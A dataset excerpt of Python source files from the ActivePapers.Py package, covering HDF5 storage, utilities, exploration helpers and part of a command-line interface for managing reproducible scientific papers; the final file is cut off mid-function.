code
stringlengths 501
5.19M
| package
stringlengths 2
81
| path
stringlengths 9
304
| filename
stringlengths 4
145
|
---|---|---|---|
import collections
import getpass
import imp
import importlib
import io
import itertools as it
import os
import socket
import sys
import weakref
import numpy as np
import h5py
from activepapers.utility import ascii, utf8, h5vstring, isstring, execcode, \
codepath, datapath, owner, mod_time, \
datatype, timestamp, stamp, ms_since_epoch
from activepapers.execution import Calclet, Importlet, DataGroup, paper_registry
from activepapers.library import find_in_library
import activepapers.version
readme_text = """
This file is an ActivePaper (Python edition).
For more information about ActivePapers see:
http://www.activepapers.org/
"""
#
# The ActivePaper class is the only one in this library
# meant to be used directly by client code.
#
class ActivePaper(object):
def __init__(self, filename, mode="r", dependencies=None):
self.filename = filename
self.file = h5py.File(filename, mode)
self.open = True
self.writable = False
if mode[0] == 'r':
assert dependencies is None
if ascii(self.file.attrs['DATA_MODEL']) != 'active-papers-py':
raise ValueError("File %s is not an ActivePaper" % filename)
self.code_group = self.file["code"]
self.data_group = self.file["data"]
self.documentation_group = self.file["documentation"]
self.writable = '+' in mode
self.history = self.file['history']
deps = self.file.get('external-dependencies/'
'python-packages', None)
if deps is None:
self.dependencies = []
else:
self.dependencies = [ascii(n) for n in deps]
for module_name in self.dependencies:
importlib.import_module(module_name)
elif mode[0] == 'w':
self.file.attrs['DATA_MODEL'] = ascii('active-papers-py')
self.file.attrs['DATA_MODEL_MAJOR_VERSION'] = 0
self.file.attrs['DATA_MODEL_MINOR_VERSION'] = 1
self.code_group = self.file.create_group("code")
self.data_group = self.file.create_group("data")
self.documentation_group = self.file.create_group("documentation")
deps = self.file.create_group('external-dependencies')
if dependencies is None:
self.dependencies = []
else:
for module_name in dependencies:
assert isstring(module_name)
importlib.import_module(module_name)
self.dependencies = dependencies
ds = deps.create_dataset('python-packages',
dtype = h5vstring,
shape = (len(dependencies),))
ds[:] = dependencies
htype = np.dtype([('opened', np.int64),
('closed', np.int64),
('platform', h5vstring),
('hostname', h5vstring),
('username', h5vstring)]
+ [(name+"_version", h5vstring)
for name in ['activepapers','python',
'numpy', 'h5py', 'hdf5']
+ self.dependencies])
self.history = self.file.create_dataset("history", shape=(0,),
dtype=htype,
chunks=(1,),
maxshape=(None,))
readme = self.file.create_dataset("README",
dtype=h5vstring, shape = ())
readme[...] = readme_text
self.writable = True
if self.writable:
self.update_history(close=False)
import activepapers.utility
self.data = DataGroup(self, None, self.data_group, ExternalCode(self))
self.imported_modules = {}
self._local_modules = {}
paper_registry[self._id()] = self
def _id(self):
return hex(id(self))[2:]
def update_history(self, close):
if close:
entry = tuple(self.history[-1])
self.history[-1] = (entry[0], ms_since_epoch()) + entry[2:]
else:
self.history.resize((1+len(self.history),))
def getversion(name):
if hasattr(sys.modules[name], '__version__'):
return getattr(sys.modules[name], '__version__')
else:
return 'unknown'
self.history[-1] = (ms_since_epoch(), 0,
sys.platform,
socket.getfqdn(),
getpass.getuser(),
activepapers.__version__,
sys.version.split()[0],
np.__version__,
h5py.version.version,
h5py.version.hdf5_version) \
+ tuple(getversion(m) for m in self.dependencies)
def close(self):
if self.open:
if self.writable:
self.update_history(close=True)
del self._local_modules
self.open = False
try:
self.file.close()
except:
pass
paper_id = hex(id(self))[2:]
try:
del paper_registry[paper_id]
except KeyError:
pass
def assert_is_open(self):
if not self.open:
raise ValueError("ActivePaper %s has been closed" % self.filename)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
def flush(self):
self.file.flush()
def _create_ref(self, path, paper_ref, ref_path, group, prefix):
if ref_path is None:
ref_path = path
if group is None:
group = 'file'
if prefix is None:
prefix = ''
else:
prefix += '/'
paper = open_paper_ref(paper_ref)
# Access the item to make sure it exists
item = getattr(paper, group)[ref_path]
ref_dtype = np.dtype([('paper_ref', h5vstring), ('path', h5vstring)])
ds = getattr(self, group).require_dataset(path, shape=(),
dtype=ref_dtype)
ds[...] = (paper_ref, prefix + ref_path)
stamp(ds, 'reference', {})
return ds
def create_ref(self, path, paper_ref, ref_path=None):
return self._create_ref(path, paper_ref, ref_path, None, None)
def create_data_ref(self, path, paper_ref, ref_path=None):
return self._create_ref(path, paper_ref, ref_path,
'data_group', '/data')
def create_code_ref(self, path, paper_ref, ref_path=None):
return self._create_ref(path, paper_ref, ref_path,
'code_group', '/code')
def create_module_ref(self, path, paper_ref, ref_path=None):
path = "python-packages/" + path
if ref_path is not None:
ref_path = "python-packages/" + ref_path
return self.create_code_ref(path, paper_ref, ref_path)
def create_copy(self, path, paper_ref, ref_path=None):
if ref_path is None:
ref_path = path
paper = open_paper_ref(paper_ref)
item = paper.file[ref_path]
self.file.copy(item, path, expand_refs=True)
copy = self.file[path]
self._delete_dependency_attributes(copy)
timestamp(copy, mod_time(item))
ref_dtype = np.dtype([('paper_ref', h5vstring), ('path', h5vstring)])
copy.attrs.create('ACTIVE_PAPER_COPIED_FROM',
shape=(), dtype=ref_dtype,
data=np.array((paper_ref, ref_path), dtype=ref_dtype))
return copy
def _delete_dependency_attributes(self, node):
for attr_name in ['ACTIVE_PAPER_GENERATING_CODELET',
'ACTIVE_PAPER_DEPENDENCIES']:
if attr_name in node.attrs:
del node.attrs[attr_name]
if isinstance(node, h5py.Group):
for item in node:
self._delete_dependency_attributes(node[item])
def store_python_code(self, path, code):
self.assert_is_open()
if not isstring(code):
raise TypeError("Python code must be a string (is %s)"
% str(type(code)))
ds = self.code_group.require_dataset(path,
dtype=h5vstring, shape = ())
ds[...] = code.encode('utf-8')
ds.attrs['ACTIVE_PAPER_LANGUAGE'] = "python"
return ds
def add_module(self, name, module_code):
path = codepath('/'.join(['', 'python-packages'] + name.split('.')))
ds = self.store_python_code(path, module_code)
stamp(ds, "module", {})
def import_module(self, name, python_path=sys.path):
if name in self.imported_modules:
return self.imported_modules[name]
if '.' in name:
# Submodule, add the underlying package first
package, _, module = name.rpartition('.')
path = [self.import_module(package, python_path)]
else:
module = name
path = python_path
file, filename, (suffix, mode, kind) = imp.find_module(module, path)
if kind == imp.PKG_DIRECTORY:
package = filename
file = open(os.path.join(filename, '__init__.py'))
name = name + '/__init__'
else:
package = None
if file is None:
raise ValueError("%s is not a Python module" % name)
if kind != imp.PY_SOURCE:
file.close()
raise ValueError("%s is not a Python source code file"
% filename)
self.add_module(name, ascii(file.read()))
file.close()
self.imported_modules[name] = package
return package
def get_local_module(self, name):
path = codepath('/'.join(['', 'python-packages'] + name.split('.')))
return APNode(self.code_group).get(path, None)
def create_calclet(self, path, script):
path = codepath(path)
if not path.startswith('/'):
path = '/'.join([self.code_group.name, path])
ds = self.store_python_code(path, script)
stamp(ds, "calclet", {})
return Calclet(self, ds)
def create_importlet(self, path, script):
path = codepath(path)
if not path.startswith('/'):
path = '/'.join([self.code_group.name, path])
ds = self.store_python_code(path, script)
stamp(ds, "importlet", {})
return Importlet(self, ds)
def run_codelet(self, path, debug=False):
if path.startswith('/'):
assert path.startswith('/code/')
path = path[6:]
node = APNode(self.code_group)[path]
class_ = {'calclet': Calclet, 'importlet': Importlet}[datatype(node)]
try:
class_(self, node).run()
return None
except Exception:
# TODO: preprocess traceback to show only the stack frames
# in the codelet.
import traceback
type, value, trace = sys.exc_info()
stack = traceback.extract_tb(trace)
del trace
while stack:
if stack[0][2] == 'execcode':
del stack[0]
break
del stack[0]
fstack = []
for filename, lineno, fn_name, code in stack:
if ':' in filename:
paper_id, codelet = filename.split(':')
paper = paper_registry.get(paper_id)
if paper is None:
paper_name = '<ActivePaper>'
else:
paper_name = '<%s>' % paper.file.filename
filename = ':'.join([paper_name, codelet])
if code is None and paper is not None:
script = utf8(paper.file[codelet][...].flat[0])
code = script.split('\n')[lineno-1]
fstack.append((filename, lineno, fn_name, code))
tb_text = ''.join(["Traceback (most recent call last):\n"] + \
traceback.format_list(fstack) + \
traceback.format_exception_only(type, value))
if debug:
sys.stderr.write(tb_text)
import pdb
pdb.post_mortem()
else:
return tb_text
def calclets(self):
return dict((item.name,
Calclet(self, item))
for item in self.iter_items()
if datatype(item) == 'calclet')
def remove_owned_by(self, codelet):
def owned(group):
nodes = []
for node in group.values():
if owner(node) == codelet:
nodes.append(node.name)
elif isinstance(node, h5py.Group) \
and datatype(node) != 'data':
nodes.extend(owned(node))
return nodes
for group in [self.code_group,
self.data_group,
self.documentation_group]:
for node_name in owned(group):
del self.file[node_name]
def replace_by_dummy(self, item_name):
item = self.file[item_name]
codelet = owner(item)
assert codelet is not None
dtype = datatype(item)
mtime = mod_time(item)
deps = item.attrs.get('ACTIVE_PAPER_DEPENDENCIES')
del self.file[item_name]
ds = self.file.create_dataset(item_name,
data=np.zeros((), dtype=np.int))
stamp(ds, dtype,
dict(ACTIVE_PAPER_GENERATING_CODELET=codelet,
ACTIVE_PAPER_DEPENDENCIES=list(deps)))
timestamp(ds, mtime)
ds.attrs['ACTIVE_PAPER_DUMMY_DATASET'] = True
def is_dummy(self, item):
return item.attrs.get('ACTIVE_PAPER_DUMMY_DATASET', False)
def iter_items(self):
"""
Iterate over the items in a paper.
"""
def walk(group):
for node in group.values():
if isinstance(node, h5py.Group) \
and datatype(node) != 'data':
for gnode in walk(node):
yield gnode
else:
yield node
for group in [self.code_group,
self.data_group,
self.documentation_group]:
for node in walk(group):
yield node
def iter_groups(self):
"""
Iterate over the groups in a paper that are not items.
"""
def walk(group):
for node in group.values():
if isinstance(node, h5py.Group) \
and datatype(node) != 'data':
yield node
for subnode in walk(node):
yield subnode
for group in [self.code_group,
self.data_group,
self.documentation_group]:
for node in walk(group):
yield node
def iter_dependencies(self, item):
"""
Iterate over the dependencies of a given item in a paper.
"""
if 'ACTIVE_PAPER_DEPENDENCIES' in item.attrs:
for dep in item.attrs['ACTIVE_PAPER_DEPENDENCIES']:
yield self.file[dep]
def is_stale(self, item):
t = mod_time(item)
for dep in self.iter_dependencies(item):
if mod_time(dep) > t:
return True
return False
def external_references(self):
def process(node, refs):
if datatype(node) == 'reference':
paper_ref, ref_path = node[()]
refs[paper_ref][0].add(ref_path)
elif 'ACTIVE_PAPER_COPIED_FROM' in node.attrs:
source = node.attrs['ACTIVE_PAPER_COPIED_FROM']
paper_ref, ref_path = source
if h5py.version.version_tuple[:2] <= (2, 2):
# h5py 2.2 returns a wrong dtype
paper_ref = paper_ref.flat[0]
ref_path = ref_path.flat[0]
refs[paper_ref][1].add(ref_path)
if isinstance(node, h5py.Group):
for item in node:
process(node[item], refs)
return refs
refs = collections.defaultdict(lambda: (set(), set()))
for node in [self.code_group, self.data_group,
self.documentation_group]:
process(node, refs)
return refs
def has_dependencies(self, item):
"""
:param item: an item in a paper
:type item: h5py.Node
:return: True if the item has any dependencies
:rtype: bool
"""
return 'ACTIVE_PAPER_DEPENDENCIES' in item.attrs \
and len(item.attrs['ACTIVE_PAPER_DEPENDENCIES']) > 0
def dependency_graph(self):
"""
:return: a dictionary mapping the name of each item to the
set of the names of the items that depend on it
:rtype: dict
"""
graph = collections.defaultdict(set)
for item in it.chain(self.iter_items(), self.iter_groups()):
for dep in self.iter_dependencies(item):
graph[dep.name].add(item.name)
return graph
def dependency_hierarchy(self):
"""
Generator yielding a sequence of sets of HDF5 paths
such that the items in each set depend only on the items
in the preceding sets.
"""
known = set()
unknown = set()
for item in self.iter_items():
d = (item.name,
frozenset(dep.name for dep in self.iter_dependencies(item)))
if len(d[1]) > 0:
unknown.add(d)
else:
known.add(d[0])
yield set(self.file[p] for p in known)
while len(unknown) > 0:
next = set(p for p, d in unknown if d <= known)
if len(next) == 0:
raise ValueError("cyclic dependencies")
known |= next
unknown = set((p, d) for p, d in unknown if p not in next)
yield set(self.file[p] for p in next)
def rebuild(self, filename):
"""
Rebuild all the dependent items in the paper in a new file.
First all items without dependencies are copied to the new
file, then all the calclets are run in the new file in the
order determined by the dependency graph in the original file.
"""
deps = self.dependency_hierarchy()
with ActivePaper(filename, 'w') as clone:
for item in next(deps):
# Make sure all the groups in the path exist
path = item.name.split('/')
name = path[-1]
groups = path[:-1]
dest = clone.file
while groups:
group_name = groups[0]
if len(group_name) > 0:
if group_name not in dest:
dest.create_group(group_name)
dest = dest[group_name]
del groups[0]
clone.file.copy(item, item.name, expand_refs=True)
timestamp(clone.file[item.name])
for items in deps:
calclets = set(item.attrs['ACTIVE_PAPER_GENERATING_CODELET']
for item in items)
for calclet in calclets:
clone.run_codelet(calclet)
def snapshot(self, filename):
"""
Make a copy of the ActivePaper in its current state.
This is meant to be used form inside long-running
codelets in order to permit external monitoring of
the progress, given that HDF5 files being written cannot
be read simultaneously.
"""
self.file.flush()
clone = h5py.File(filename, 'w')
for item in self.file:
clone.copy(self.file[item], item, expand_refs=True)
for attr_name in self.file.attrs:
clone.attrs[attr_name] = self.file.attrs[attr_name]
clone.close()
def open_internal_file(self, path, mode='r', encoding=None, creator=None):
# path is always relative to the root group
if path.startswith('/'):
path = path[1:]
if not path.startswith('data/') \
and not path.startswith('documentation/'):
raise IOError((13, "Permission denied: '%s'" % path))
if creator is None:
creator = ExternalCode(self)
if mode[0] in ['r', 'a']:
ds = self.file[path]
elif mode[0] == 'w':
test = self.file.get(path, None)
if test is not None:
if not creator.owns(test):
raise ValueError("%s trying to overwrite data"
" created by %s"
% (creator.path, owner(test)))
del self.file[path]
ds = self.file.create_dataset(
path, shape = (0,), dtype = np.uint8,
chunks = (100,), maxshape = (None,))
else:
raise ValueError("unknown file mode %s" % mode)
return InternalFile(ds, mode, encoding)
#
# A dummy replacement that emulates the interface of Calclet.
#
class ExternalCode(object):
def __init__(self, paper):
self.paper = paper
self.path = None
def add_dependency(self, dependency):
pass
def dependency_attributes(self):
return {}
def owns(self, node):
# Pretend to be the owner of everything
return True
#
# A Python file interface for byte array datasets
#
class InternalFile(io.IOBase):
def __init__(self, ds, mode, encoding=None):
self._ds = ds
self._mode = mode
self._encoding = encoding
self._position = 0
self._closed = False
self._binary = 'b' in mode
self._get_attributes = lambda: {}
self._stamp()
def readable(self):
return True
def writable(self):
return self._mode[0] == 'w' or '+' in self._mode
@property
def closed(self):
return self._closed
@property
def mode(self):
return self._mode
@property
def name(self):
return self._ds.name
def _check_if_open(self):
if self._closed:
raise ValueError("file has been closed")
def _convert(self, data):
if self._binary:
return data
elif self._encoding is not None:
return data.decode(self._encoding)
else:
return ascii(data)
def _set_attribute_callback(self, callback):
self._get_attributes = callback
def _stamp(self):
if self.writable():
stamp(self._ds, "file", self._get_attributes())
def close(self):
self._closed = True
self._stamp()
def flush(self):
self._check_if_open()
def isatty(self):
return False
def __next__(self):
self._check_if_open()
if self._position == len(self._ds):
raise StopIteration
return self.readline()
next = __next__ # for Python 2
def __iter__(self):
return self
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
def read(self, size=None):
self._check_if_open()
if size is None:
size = len(self._ds)-self._position
if size == 0:
return ''
else:
new_position = self._position + size
data = self._ds[self._position:new_position]
self._position = new_position
return self._convert(data.tostring())
def readline(self, size=None):
self._check_if_open()
remaining = len(self._ds) - self._position
if remaining == 0:
return self._convert('')
for l in range(min(100, remaining), remaining+100, 100):
data = self._ds[self._position:self._position+l]
eols = np.nonzero(data == 10)[0]
if len(eols) > 0:
n = eols[0]+1
self._position += n
return self._convert(data[:n].tostring())
self._position = len(self._ds)
return self._convert(data.tostring())
def readlines(self, sizehint=None):
self._check_if_open()
return list(line for line in self)
def seek(self, offset, whence=os.SEEK_SET):
self._check_if_open()
file_length = len(self._ds)
if whence == os.SEEK_SET:
self._position = offset
elif whence == os.SEEK_CUR:
self._position += offset
elif whence == os.SEEK_END:
self._position = file_length + offset
self._position = max(0, min(file_length, self._position))
def tell(self):
self._check_if_open()
return self._position
def truncate(self, size=None):
self._check_if_open()
if size is None:
size = self._position
self._ds.resize((size,))
self._stamp()
def write(self, string):
self._check_if_open()
if self._mode[0] == 'r':
raise IOError("File not open for writing")
if not string:
# HDF5 crashes when trying to write a zero-length
# slice, so this must be handled as a special case.
return
if self._encoding is not None:
string = string.encode(self._encoding)
new_position = self._position + len(string)
if new_position > len(self._ds):
self._ds.resize((new_position,))
self._ds[self._position:new_position] = \
np.fromstring(string, dtype=np.uint8)
self._position = new_position
self._stamp()
def writelines(self, strings):
self._check_if_open()
for line in strings:
self.write(line)
#
# A wrapper for nodes that works across references
#
class APNode(object):
def __init__(self, h5node, name = None):
self._h5node = h5node
self.name = h5node.name if name is None else name
def is_group(self):
return isinstance(self._h5node, h5py.Group)
def __contains__(self, item):
return item in self._h5node
def __getitem__(self, item):
if isinstance(self._h5node, h5py.Group):
path = item.split('/')
if path[0] == '':
node = APNode(self._h5node.file)
path = path[1:]
else:
node = self
for item in path:
node = node._getitem(item)
return node
else:
return self._h5node[item]
def get(self, item, default):
try:
return self[item]
except:
return default
def _getitem(self, item):
node = self._h5node
if datatype(node) == 'reference':
_, node = dereference(node)
node = node[item]
if datatype(node) == 'reference':
_, node = dereference(node)
name = self.name
if not name.endswith('/'): name += '/'
name += item
return APNode(node, name)
def __getattr__(self, attrname):
return getattr(self._h5node, attrname)
def in_paper(self, paper):
return paper.file.id == self._h5node.file.id
#
# A global dictionary mapping paper_refs to papers.
# Each entry disappears when no reference to the paper remains.
#
_papers = weakref.WeakValueDictionary()
# # Close all open referenced papers at interpreter exit,
# # in order to prevent "murdered identifiers" in h5py.
# def _cleanup():
# for paper in activepapers.storage._papers.values():
# paper.close()
# import atexit
# atexit.register(_cleanup)
# del atexit
#
# Dereference a reference node
#
def dereference(ref_node):
assert datatype(ref_node) == 'reference'
paper_ref, path = ref_node[()]
paper = open_paper_ref(ascii(paper_ref))
return paper, paper.file[path]
#
# Open a paper given its reference
#
def open_paper_ref(paper_ref):
if paper_ref in _papers:
return _papers[paper_ref]
paper = ActivePaper(find_in_library(paper_ref), "r")
_papers[paper_ref] = paper
return paper | ActivePapers.Py | /ActivePapers.Py-0.2.2.tar.gz/ActivePapers.Py-0.2.2/lib/activepapers/storage.py | storage.py |
import sys
import time
# Python 2/3 compatibility issues
if sys.version_info[0] == 2:
from activepapers.utility2 import *
else:
from activepapers.utility3 import *
# Various small functions
def datatype(node):
s = node.attrs.get('ACTIVE_PAPER_DATATYPE', None)
if s is None:
return s
else:
return ascii(s)
def owner(node):
s = node.attrs.get('ACTIVE_PAPER_GENERATING_CODELET', None)
if s is None:
return s
else:
return ascii(s)
def language(node):
s = node.attrs.get('ACTIVE_PAPER_LANGUAGE', None)
if s is None:
return s
else:
return ascii(s)
def mod_time(node):
s = node.attrs.get('ACTIVE_PAPER_TIMESTAMP', None)
if s is None:
return s
else:
return s/1000.
def ms_since_epoch():
return np.int64(1000.*time.time())
def timestamp(node, time=None):
if time is None:
time = ms_since_epoch()
else:
time *= 1000.
node.attrs['ACTIVE_PAPER_TIMESTAMP'] = time
def stamp(node, ap_type, attributes):
allowed_transformations = {'group': 'data',
'data': 'group',
'file': 'text'}
attrs = dict(attributes)
attrs['ACTIVE_PAPER_DATATYPE'] = ap_type
for key, value in attrs.items():
if value is None:
continue
if isstring(value):
previous = node.attrs.get(key, None)
if previous is None:
node.attrs[key] = value
else:
if previous != value:
# String attributes can't change when re-stamping...
if key == 'ACTIVE_PAPER_DATATYPE' \
and allowed_transformations.get(previous) == value:
# ...with a few exceptions
node.attrs[key] = value
else:
raise ValueError("%s: %s != %s"
% (key, value, previous))
elif key == 'ACTIVE_PAPER_DEPENDENCIES':
node.attrs.create(key, np.array(value, dtype=object),
shape = (len(value),), dtype=h5vstring)
else:
raise ValueError("unexpected key %s" % key)
timestamp(node)
def path_in_section(path, section):
if not isstring(path):
raise ValueError("type %s where string is expected"
% str(type(path)))
if path.startswith("/"):
return section + path
else:
return path
def datapath(path):
return path_in_section(path, "/data")
def codepath(path):
return path_in_section(path, "/code") | ActivePapers.Py | /ActivePapers.Py-0.2.2.tar.gz/ActivePapers.Py-0.2.2/lib/activepapers/utility.py | utility.py |
from activepapers.storage import ActivePaper as ActivePaperStorage
from activepapers.storage import open_paper_ref
from activepapers.utility import path_in_section
class ActivePaper(object):
def __init__(self, file_or_ref, use_code=True):
global _paper_for_code
try:
self.paper = open_paper_ref(file_or_ref)
except ValueError:
self.paper = ActivePaperStorage(file_or_ref, 'r')
if use_code and ("python-packages" not in self.paper.code_group \
or len(self.paper.code_group["python-packages"]) == 0):
# The paper contains no importable modules or packages.
use_code = False
if use_code and _paper_for_code is not None:
raise IOError("Only one ActivePaper per process can use code.")
self.data = self.paper.data
self.documentation = self.paper.documentation_group
self.code = self.paper.code_group
try:
self.__doc__ = self.open_documentation('README').read()
except KeyError:
pass
if use_code:
_paper_for_code = self.paper
def close(self):
global _paper_for_code
if _paper_for_code is self.paper:
_paper_for_code = None
def _open(self, path, section, mode='r'):
if mode not in ['r', 'rb']:
raise ValueError("invalid mode: " + repr(mode))
path = path_in_section(path, section)
if not path.startswith('/'):
path = section + '/' + path
return self.paper.open_internal_file(path, mode, 'utf8', None)
def open(self, path, mode='r'):
return self._open(path, '/data', mode)
def open_documentation(self, path, mode='r'):
return self._open(path, '/documentation', mode)
def read_code(self, file):
return self.code[file][...].ravel()[0].decode('utf-8')
_paper_for_code = None
def _get_codelet_and_paper():
return None, _paper_for_code
import activepapers.execution
activepapers.execution.get_codelet_and_paper = _get_codelet_and_paper
del _get_codelet_and_paper | ActivePapers.Py | /ActivePapers.Py-0.2.2.tar.gz/ActivePapers.Py-0.2.2/lib/activepapers/exploration.py | exploration.py |
import fnmatch
import itertools as it
import os
import re
import subprocess
import sys
import time
import tempdir
import numpy
import h5py
import activepapers.storage
from activepapers.utility import ascii, datatype, mod_time, stamp, \
timestamp, raw_input
class CLIExit(Exception):
pass
def get_paper(input_filename):
if input_filename is not None:
return input_filename
apfiles = [fn for fn in os.listdir('.') if fn.endswith('.ap')]
if len(apfiles) == 1:
return apfiles[0]
sys.stderr.write("no filename given and ")
if apfiles:
sys.stderr.write("%d HDF5 files in current directory\n" % len(apfiles))
else:
sys.stderr.write("no HDF5 file in current directory\n")
raise CLIExit
#
# Support for checkin/checkout/extract
#
extractable_types = ['calclet', 'importlet', 'module', 'file', 'text']
file_extensions = {('calclet', 'python'): '.py',
('importlet', 'python'): '.py',
('module', 'python'): '.py',
('file', None): '',
('text', 'HTML'): '.html',
('text', 'LaTeX'): '.tex',
('text', 'markdown'): '.md',
('text', 'reStructuredText'): '.rst',
('text', None): '.txt'}
file_languages = dict((_ext, _l)
for (_t, _l), _ext in file_extensions.items())
def extract_to_file(paper, item, file=None, filename=None, directory=None):
if file is None:
if filename is not None:
filename = os.path.abspath(filename)
if directory is not None:
directory = os.path.abspath(directory)
if filename is not None and directory is not None:
if not filename.startswith(directory):
raise ValueError("% not in directory %s"
% (filename, directory))
if filename is None:
item_name = item.name.split('/')[1:]
filename = os.path.join(directory, *item_name)
if '.' not in item_name[-1]:
# Add a file extension using some heuristics
language = item.attrs.get('ACTIVE_PAPER_LANGUAGE', None)
filename += file_extensions.get((datatype(item), language), '')
directory, _ = os.path.split(filename)
if directory and not os.path.exists(directory):
os.makedirs(directory)
file = open(filename, 'wb')
close = True
else:
# If a file object is given, no other file specification is allowed
assert filename is None
assert directory is None
close = False
dt = datatype(item)
if dt in ['file', 'text']:
internal = activepapers.storage.InternalFile(item, 'rb')
file.write(internal.read())
elif dt in extractable_types:
file.write(item[...].flat[0])
else:
raise ValueError("cannot extract dataset %s of type %s"
% (item.name, dt))
if close:
file.close()
mtime = mod_time(item)
if mtime:
os.utime(filename, (mtime, mtime))
return filename
def update_from_file(paper, filename, type=None,
force_update=False, dry_run=False,
dataset_name=None, create_new=True):
if not os.path.exists(filename):
raise ValueError("File %s not found" % filename)
mtime = os.path.getmtime(filename)
basename = filename
ext = ''
if dataset_name is not None:
item = paper.file.get(dataset_name, None)
if item is not None:
basename = item.name
else:
item = paper.file.get(basename, None)
if item is None:
basename, ext = os.path.splitext(filename)
item = paper.file.get(basename, None)
language = file_languages.get(ext, None)
if item is None:
if not create_new:
return
# Create new item
if type is None:
raise ValueError("Datatype required to create new item %s"
% basename)
if type in ['calclet', 'importlet', 'module']:
if not basename.startswith('code/'):
raise ValueError("Items of type %s must be"
" in the code section"
% type)
if language != 'python':
raise ValueError("Items of type %s must be Python code"
% type)
if type == 'module' and \
not basename.startswith('code/python-packages/'):
raise ValueError("Items of type %s must be in"
"code/python-packages"
% type)
elif type == 'file':
if not basename.startswith('data/') \
and not basename.startswith('documentation/'):
raise ValueError("Items of type %s must be"
" in the data or documentation section"
% type)
basename += ext
elif type == 'text':
if not basename.startswith('documentation/'):
raise ValueError("Items of type %s must be"
" in the documentation section"
% type)
else:
# Update existing item
if mtime <= mod_time(item) and not force_update:
if dry_run:
sys.stdout.write("Skip %s: file %s is not newer\n"
% (item.name, filename))
return
if type is not None and type != datatype(item):
raise ValueError("Cannot change datatype %s to %s"
% (datatype(item), type))
if type is None:
type = datatype(item)
if language is None:
language = item.attrs.get('ACTIVE_PAPER_LANGUAGE', None)
if dry_run:
sys.stdout.write("Delete %s\n" % item.name)
else:
del item.parent[item.name.split('/')[-1]]
if dry_run:
fulltype = type if language is None else '/'.join((type, language))
sys.stdout.write("Create item %s of type %s from file %s\n"
% (basename, fulltype, filename))
else:
if type in ['calclet', 'importlet', 'module']:
code = open(filename, 'rb').read().decode('utf-8')
item = paper.store_python_code(basename[5:], code)
stamp(item, type, {})
timestamp(item, mtime)
elif type in ['file', 'text']:
f = paper.open_internal_file(basename, 'w')
f.write(open(filename, 'rb').read())
f.close()
stamp(f._ds, type, {'ACTIVE_PAPER_LANGUAGE': language})
timestamp(f._ds, mtime)
def directory_pattern(pattern):
if pattern[-1] in "?*/":
return None
return pattern + "/*"
def process_patterns(patterns):
if patterns is None:
return None
patterns = sum([(p, directory_pattern(p)) for p in patterns], ())
patterns = [re.compile(fnmatch.translate(p))
for p in patterns
if p is not None]
return patterns
#
# Command handlers called from argparse
#
def create(paper, d=None):
if paper is None:
sys.stderr.write("no paper given\n")
raise CLIExit
paper = activepapers.storage.ActivePaper(paper, 'w', d)
paper.close()
def ls(paper, long, type, pattern):
paper = get_paper(paper)
paper = activepapers.storage.ActivePaper(paper, 'r')
pattern = process_patterns(pattern)
for item in paper.iter_items():
name = item.name[1:] # remove initial slash
dtype = datatype(item)
if item.attrs.get('ACTIVE_PAPER_DUMMY_DATASET', False):
dtype = 'dummy'
if pattern and \
not any(p.match(name) for p in pattern):
continue
if type is not None and dtype != type:
continue
if long:
t = item.attrs.get('ACTIVE_PAPER_TIMESTAMP', None)
if t is None:
sys.stdout.write(21*" ")
else:
sys.stdout.write(time.strftime("%Y-%m-%d/%H:%M:%S ",
time.localtime(t/1000.)))
field_len = len("importlet ") # the longest data type name
sys.stdout.write((dtype + field_len*" ")[:field_len])
sys.stdout.write('*' if paper.is_stale(item) else ' ')
sys.stdout.write(name)
sys.stdout.write('\n')
paper.close()
def rm(paper, force, pattern):
paper_name = get_paper(paper)
paper = activepapers.storage.ActivePaper(paper_name, 'r')
deps = paper.dependency_graph()
pattern = process_patterns(pattern)
if not pattern:
return
names = set()
for item in it.chain(paper.iter_items(), paper.iter_groups()):
if any(p.match(item.name[1:]) for p in pattern):
names.add(item.name)
paper.close()
if not names:
return
while True:
new_names = set()
for name in names:
for dep in deps[name]:
new_names.add(dep)
if new_names - names:
names |= new_names
else:
break
names = sorted(names)
if not force:
for name in names:
sys.stdout.write(name + '\n')
while True:
reply = raw_input("Delete ? (y/n) ")
if reply in "yn":
break
if reply == 'n':
return
paper = activepapers.storage.ActivePaper(paper_name, 'r+')
most_recent_group = None
for name in names:
if most_recent_group and name.startswith(most_recent_group):
continue
if isinstance(paper.file[name], h5py.Group):
most_recent_group = name
try:
del paper.file[name]
except:
sys.stderr.write("Can't delete %s\n" % name)
paper.close()
def dummy(paper, force, pattern):
paper_name = get_paper(paper)
paper = activepapers.storage.ActivePaper(paper_name, 'r')
deps = paper.dependency_graph()
pattern = process_patterns(pattern)
if not pattern:
return
names = set()
for item in paper.iter_items():
if any(p.match(item.name[1:]) for p in pattern):
names.add(item.name)
paper.close()
if not names:
return
names = sorted(names)
if not force:
for name in names:
sys.stdout.write(name + '\n')
while True:
reply = raw_input("Replace by dummy datasets? (y/n) ")
if reply in "yn":
break
if reply == 'n':
return
paper = activepapers.storage.ActivePaper(paper_name, 'r+')
for name in names:
try:
paper.replace_by_dummy(name)
except:
sys.stderr.write("Can't replace %s by dummy\n" % name)
raise
paper.close()
def set_(paper, dataset, expr):
paper = get_paper(paper)
paper = activepapers.storage.ActivePaper(paper, 'r+')
value = eval(expr, numpy.__dict__, {})
try:
del paper.data[dataset]
except KeyError:
pass
paper.data[dataset] = value
paper.close()
def group(paper, group_name):
if group_name.startswith('/'):
group_name = group_name[1:]
top_level = group_name.split('/')[0]
if top_level not in ['code', 'data', 'documentation']:
sys.stderr.write("invalid group name %s\n" % group_name)
raise CLIExit
paper = get_paper(paper)
paper = activepapers.storage.ActivePaper(paper, 'r+')
paper.file.create_group(group_name)
paper.close()
def extract(paper, dataset, filename):
paper = get_paper(paper)
paper = activepapers.storage.ActivePaper(paper, 'r')
ds = paper.file[dataset]
try:
if filename == '-':
extract_to_file(paper, ds, file=sys.stdout)
else:
extract_to_file(paper, ds, filename=filename)
except ValueError as exc:
sys.stderr.write(exc.args[0] + '\n')
raise CLIExit
def _script(paper, dataset, filename, run, create_method):
paper = get_paper(paper)
paper = activepapers.storage.ActivePaper(paper, 'r+')
script = open(filename).read()
codelet = getattr(paper, create_method)(dataset, script)
if run:
codelet.run()
paper.close()
def calclet(paper, dataset, filename, run):
_script(paper, dataset, filename, run, "create_calclet")
def importlet(paper, dataset, filename, run):
_script(paper, dataset, filename, run, "create_importlet")
def import_module(paper, module):
paper = get_paper(paper)
